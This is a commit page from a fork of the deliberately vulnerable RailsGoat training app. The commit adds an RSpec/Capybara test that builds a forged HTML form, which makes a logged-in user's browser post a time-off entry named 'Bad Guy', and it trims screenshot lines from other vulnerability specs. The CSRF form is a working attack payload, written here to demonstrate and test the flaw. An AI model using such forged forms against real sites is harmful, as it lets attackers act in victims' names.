team-alpha/railsgoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added example of CSRF vulnerability in csrf_spec.

Browse Source
This commit is contained in:
chrismo
2013-09-30 15:29:36 -05:00
parent da061c79b6
commit 0df6735b53
3 changed files with 44 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files
spec/features/command_injection_spec.rb
-2
View File
@@ -21,10 +21,8 @@ feature 'command injection' do
attach_file 'benefits_upload', hackety_file attach_file 'benefits_upload', hackety_file
find(:xpath, "//input[@id='benefits_backup']", :visible => false).set 'true' find(:xpath, "//input[@id='benefits_backup']", :visible => false).set 'true'
end end
save_screenshot('screenshot.before.upload.png')
click_on 'Start Upload' click_on 'Start Upload'
end end
save_screenshot('screenshot.after.upload.png')
File.exists?(legit_file).should be_false File.exists?(legit_file).should be_false
end end
end end
spec/features/csrf_spec.rb
+44
View File
@@ -0,0 +1,44 @@
require 'spec_helper'
require 'tmpdir'
feature 'csrf' do
before do
UserFixture.reset_all_users
@normal_user = UserFixture.normal_user
end
scenario 'csrf attack to pto', :js => true do
visit '/'
# TODO: is there a way to get this without visiting root first?
base_url = current_url
login @normal_user
Dir.mktmpdir do |dir|
hackety_file = File.join(dir, 'form.on.bad.guy.site.html')
post_url = "#{base_url}schedule.json"
File.open(hackety_file, 'w') do |f|
f.print <<-HTML
<html>
<body>
<form id='submit_me' action="#{post_url}" method="POST">
<input type="hidden" name="schedule&#91;event&#95;name&#93;" value="Bad&#32;Guy" />
<input type="hidden" name="schedule&#91;event&#95;type&#93;" value="pto" />
<input type="hidden" name="schedule&#91;event&#95;desc&#93;" value="Fun&#32;Fun" />
<input type="hidden" name="date&#95;range1" value="06&#47;08&#47;2013&#32;&#45;&#32;06&#47;09&#47;2013" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
HTML
end
page.driver.visit "file://#{hackety_file}"
within('#submit_me') do
click_on 'Submit request'
end
end
@normal_user.reload.paid_time_off.schedule.last.event_name.should == 'Bad Guy'
end
end
spec/features/xss_spec.rb
-1
View File
@@ -18,7 +18,6 @@ feature 'xss' do
fill_in 'user_password_confirmation', :with => @normal_user.clear_password fill_in 'user_password_confirmation', :with => @normal_user.clear_password
end end
click_on 'Submit' click_on 'Submit'
save_screenshot('screenshot.post.submit.png')
visit '/' visit '/'